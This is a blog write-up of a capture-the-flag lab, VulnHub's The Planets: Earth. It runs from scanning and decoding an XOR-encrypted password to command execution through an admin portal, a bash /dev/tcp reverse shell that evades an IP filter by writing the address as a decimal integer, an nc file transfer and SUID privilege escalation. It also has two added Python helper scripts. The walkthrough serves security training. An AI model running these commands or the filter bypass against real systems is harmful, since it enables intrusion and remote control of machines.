VulnHub: The Planets Earth Writeup

David Mentgen
Published in TestingOnProd
6 min read · Dec 19, 2021

For this writeup, I’ll be going through how I completed VulnHub’s The Planets: Earth box.

Step 1: Nmap Scan

As usual, let’s perform an nmap scan to see what we’re dealing with

nmap -A -sS -p- -oN ./nmap_scan $BOX

  • -A: Aggressive scan. According to man nmap, it enables OS detection, version detection, default script scanning, and traceroute
  • -sS: TCP SYN (“half-open”) scan technique; it needs root/raw-socket privileges
  • -p-: Scan all 65535 TCP ports instead of nmap’s default top 1000
  • -oN <file_name>: Save the results in nmap’s normal output format for future reference
  • $BOX: The target box’s IP address

It seems we have a pretty simple setup with only 3 ports open: 22/ssh, 80/http, and 443/https. The scan output also surfaces some DNS names for the host. Let’s deal with those first in the next step.

Step 2: Add to /etc/hosts

I’ll go ahead and add the hostnames from the nmap scan to /etc/hosts so they resolve to $BOX.

Step 3: Visit web pages

Now that we have that done, let’s check all of the sites and see what we can find. Let’s start by looking at port 80.

Mkay, nothing interesting here. Let’s check what’s on port 443.

Now let’s check the two hostnames we added to /etc/hosts.

Step 4: Robots.txt

Checking robots.txt on each of the sites above, you’ll eventually find an interesting entry for /testingnotes.* (the file extension is wildcarded).

Trying /testingnotes.* with each of the common extensions (txt, html, php, and so on), you’ll eventually find /testingnotes.txt.

Step 5: Visit /testingnotes.txt

These look like developer/admin notes left on the web server. I took note of the terra username for the admin portal. Let’s take a look at testdata.txt.

It seems this file was used as the key to encrypt the messages shown on the earth.local page. Let’s try to decode those messages using it.

Step 6: Decode Message(s)

Looking at the messages on earth.local, each is a long hex string, which suggests ASCII text that has been encrypted and then hex-encoded. I’m going to detail how to decrypt the bottom message (starting with “2402”) because, **spoiler**, the other messages decode to gibberish.

First, we need to convert testdata.txt to hex. I just used an online hex converter for this.

I then used that hex as the key in an online XOR tool, with the message we want to decrypt pasted into the left (input) box.

I then converted the resulting hex back to ASCII.

The result is earthclimatechangebad4humans repeated over and over, which strongly suggests a password. Let’s try using it to log in as terra.
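The decode steps above done locally instead of with online tools, as an added example that is not code from the original writeup. It assumes, as those steps imply, a plain XOR of the message bytes against the key bytes; the KEY text and MESSAGE_HEX below are constructed stand-ins for testdata.txt and the “2402…” message, not the real values, and the shortest_period helper is mine:

```python
"""Decode an XOR-encrypted, hex-encoded message with a known key file and pull
out the repeating plaintext. Added example, not code from the original writeup;
KEY and MESSAGE_HEX are constructed stand-ins for testdata.txt and the
"2402..." message on earth.local, not the real values."""
from itertools import cycle


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data against key, repeating the key if data is longer. When the key
    is longer (as with testdata.txt) zip simply stops at the end of data."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def xor_decode_hex(hex_message: str, key: bytes) -> bytes:
    """The manual steps in one call: hex -> bytes, then XOR with the key bytes.
    Whitespace/newlines in a pasted hex blob are ignored."""
    return xor_bytes(bytes.fromhex("".join(hex_message.split())), key)


def shortest_period(text: bytes) -> bytes:
    """Smallest unit whose repetition reproduces text, e.g. b'abcabcab' -> b'abc'.
    Returns the whole text if it does not repeat."""
    n = len(text)
    for p in range(1, n + 1):
        if (text[:p] * (n // p + 1))[:n] == text:
            return text[:p]
    return text


def recover_password(hex_message: str, key: bytes) -> str:
    """Decode and reduce to the repeating unit. Bytes that are not ASCII (the
    'gibberish' case for the other messages) are shown as backslash escapes."""
    unit = shortest_period(xor_decode_hex(hex_message, key))
    return unit.decode("ascii", errors="backslashreplace")


# Constructed key text (NOT the real testdata.txt) and a message built from it:
# the password repeated out to the key length, XORed, hex-encoded.
KEY = b"the quick brown fox jumps over the lazy dog, once more with feeling, for this demo"
PASSWORD = b"earthclimatechangebad4humans"
MESSAGE_HEX = xor_bytes((PASSWORD * 4)[: len(KEY)], KEY).hex()

if __name__ == "__main__":
    print(recover_password(MESSAGE_HEX, KEY))  # earthclimatechangebad4humans
```

On a real engagement this is also the version to use: pasting a client’s key material or ciphertext into a random website is a habit worth breaking, and the whole decode is a dozen lines. If the decoded bytes are not printable, recover_password shows them escaped rather than crashing, which is what the two gibberish messages look like.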

Step 7: Login as Terra

I realize now that you’re probably wondering how I found the admin page. I forgot to mention that I also ran gobuster against each of the web pages we found, and that turned up http://earth.local/admin:

Anyway, let’s visit that admin portal and log in with the creds terra/earthclimatechangebad4humans.

Nice, it works, and the portal turns out to be a convenient web page for running commands on the box. Naturally, I’ll start by trying to pop a reverse shell.

Well, that’s annoying: the page refuses the command with “Remote connections are forbidden”.

Step 8: Let’s see what we can do (user flag found)

Before going any further, I dig around the filesystem and eventually stumble across /var/earth_web, which contains the user flag.

Nice, now we just need to get the root flag.

Step 9: Reverse Shell Again

After some googling, I find that we can write the IP address as a single decimal integer and bash will still connect to it through /dev/tcp. That gets us past the “Remote connections are forbidden” check, because the filter apparently only rejects input that contains a dotted-quad IP address; it doesn’t actually block outbound connections. Don’t believe me? Watch what happens when I input only an IP address and nothing else:

So let’s try it with my IP converted to decimal (172294500 is 10.69.1.100). For this, I just used an online tool to convert my IP.

bash -i >& /dev/tcp/172294500/10000 0>&1

Before executing this command, in another terminal I have a listener waiting with the command:

nc -nvlp 10000

Now that our listener is up and running, we’ll go ahead and execute the command from the admin page and catch it with our listener.

Nice, we’re in. I’ll upgrade this to a proper TTY shell using Python’s pty module.

Step 10: Check SUIDs

Now that we have a shell on the system, let’s list the SUID binaries and see if any of them offers a way to escalate to root.

find / -perm -4000 2>/dev/null

Hmm, /usr/bin/reset_root looks interesting. Running it produces the following output:

Aw yeah, I think we’re definitely looking in the right place. Let’s pull reset_root back to our box so we can take a closer look at it. The listener has to be up first, so start on my machine:

My Machine: nc -nvlp <port_i_want_to_use> > reset_root

and then push the file from the target (the -w 3 makes nc give up a few seconds after the data is sent):

Target machine: nc -w 3 <my_ip> <my_port> < reset_root

Comparing a checksum of both copies (md5sum or sha256sum) is a cheap way to make sure the transfer wasn’t truncated before you start reversing the wrong bytes.

Step 11: Investigate reset_root

Let’s start by running strings on it to see if anything interesting is embedded in the binary.

Looking at the output, I can guess that it resets the root password once some trigger conditions are met. Let’s run ltrace to see what those triggers are. First we need to make the file executable on our box.

chmod +x ./reset_root

and then run ltrace on it

ltrace ./reset_root

Ah, so it just checks whether a handful of specific files exist, and bails out when they don’t. Let’s create those files on the target box (creating them empty, e.g. with touch, should be enough for an existence check) and run it again.
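Added example, not part of the original writeup: a small parser for ltrace output that lists the file checks which failed, so you know exactly what to create on the target. LTRACE_SAMPLE is constructed, with placeholder paths and messages rather than the real reset_root output:

```python
"""Pick out the failed file-existence checks from ltrace output. Added
example, not from the original writeup; LTRACE_SAMPLE is constructed and its
paths are placeholders, not the real reset_root trigger files."""
import re
import shlex

# ltrace prints one library call per line:  name(args) = return value
CALL_RE = re.compile(r'^(?P<func>\w+)\((?P<args>.*)\)\s*=\s*(?P<ret>-?\d+|0x[0-9a-fA-F]+)\s*$')
FIRST_STRING_RE = re.compile(r'"([^"]*)"')
# libc calls whose first argument is a path and whose failure means "not there"
FILE_FUNCS = {"access", "stat", "stat64", "lstat", "lstat64",
              "open", "open64", "fopen", "fopen64"}

LTRACE_SAMPLE = """\
puts("looking for trigger files")                    = 26
access("/tmp/example/trigger1", 0)                   = -1
access("/tmp/example/trigger2", 0)                   = -1
access("/etc/passwd", 0)                             = 0
fopen("/tmp/example/settings.conf", "r")             = 0
puts("triggers missing, not resetting anything")     = 41
"""


def missing_files(ltrace_output: str) -> list:
    """Paths of file-related calls that failed: a negative return for the
    open/stat/access family, a NULL (0) return for fopen."""
    missing = []
    for line in ltrace_output.splitlines():
        m = CALL_RE.match(line.strip())
        if not m or m.group("func") not in FILE_FUNCS:
            continue
        path = FIRST_STRING_RE.match(m.group("args"))
        if not path:
            continue
        ret = int(m.group("ret"), 0)
        failed = ret == 0 if m.group("func").startswith("fopen") else ret < 0
        if failed and path.group(1) not in missing:
            missing.append(path.group(1))
    return missing


def create_commands(paths: list) -> list:
    """Shell lines to create each missing path on the target (parent dirs
    included), quoted so odd characters in a path cannot bite."""
    return [f"mkdir -p {shlex.quote(p.rsplit('/', 1)[0] or '/')} && touch {shlex.quote(p)}"
            for p in paths]


if __name__ == "__main__":
    for cmd in create_commands(missing_files(LTRACE_SAMPLE)):
        print(cmd)
```

If ltrace is not on the target and the binary cannot be copied off, strace -f -e trace=file gives the same picture one layer down (syscalls rather than libc calls) and is more commonly installed.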

Nice, the root password has been reset, so now let’s switch to root.

Now grab the root flag from root’s home directory.

Conclusion

Overall, this was a pretty fun easy-level box to knock out. If you found other ways of cracking this box, definitely let me know below in the comments!


Originally published at http://testingonprod.com on December 19, 2021.
